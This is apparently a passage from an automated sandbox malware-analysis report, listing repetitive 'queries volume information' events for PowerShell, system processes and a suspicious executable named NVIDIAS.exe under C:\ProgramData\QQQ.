Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\ProgramData\QQQ\NVIDIAS.exe VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation | |
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation | |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation | |